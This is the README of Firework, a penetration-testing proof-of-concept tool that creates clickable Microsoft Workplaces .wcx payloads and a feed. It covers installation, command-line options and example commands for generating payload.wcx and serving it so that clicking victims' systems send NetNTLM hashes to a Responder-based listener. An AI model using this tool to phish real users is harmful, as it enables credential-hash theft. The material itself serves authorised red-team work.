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Firework

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Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process. The tool also wraps some code from Responder to leverage its ability to capture NetNTLM hashes from a system that provisions a Workplace feed via it.

This tool may be used as part of a penetration test or red team exercise to create a .wcx payload (and associated feed) that if clicked on could be used to:

Read the SpiderLabs blog for a more detailed summary and walk through.

Installation

$ pip install -r requirements.txt

Usage


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usage: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN]
                   [-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH]
                   [-t CERT] [-k KEY]

WCX workplace tool

optional arguments:
  -h, --help            show this help message and exit
  -c COMPANY, --company COMPANY
                        Company name
  -u URL, --url URL     Feed URL
  -a APP, --app APP     App Name
  -e EXT, --ext EXT     App Extension
  -i ICON, --icon ICON  App Icon
  -l LISTEN, --listen LISTEN
                        TLS Web Server Port
  -r RDP, --rdp RDP     RDP Server
  -d DOMAIN, --domain DOMAIN
                        RDP Domain
  -n USERNAME, --username USERNAME
                        RDP Username
  -p PASSWORD, --password PASSWORD
                        RDP Password
  -t CERT, --cert CERT  SSL cert
  -k KEY, --key KEY     SSL key

Examples

Basic example:

python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico 

In built web server will start on port 443 if cert.crt and key.pem are present in current directory. This will force an NTLM challenge with responder. If these files are not present the tool will write all files to local directory for your own hosting.

If you wish to start the in-built web server on alternate port use the -l flag as below:

python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -l 8443

You can also add some customisations to the .rdp file that gets served.

Note: Passwords stored in .rdp files are likely ignored in a default config.

python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <crypt password>

Payload

Having run the tool 'payload.wcx' will be written to current directory. This file is what when clicked on starts the provisioning process.

Authors

License

Firework

Created by David Middlehurst Copyright (C) 2018 Trustwave Holdings, Inc.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

Acknowledgments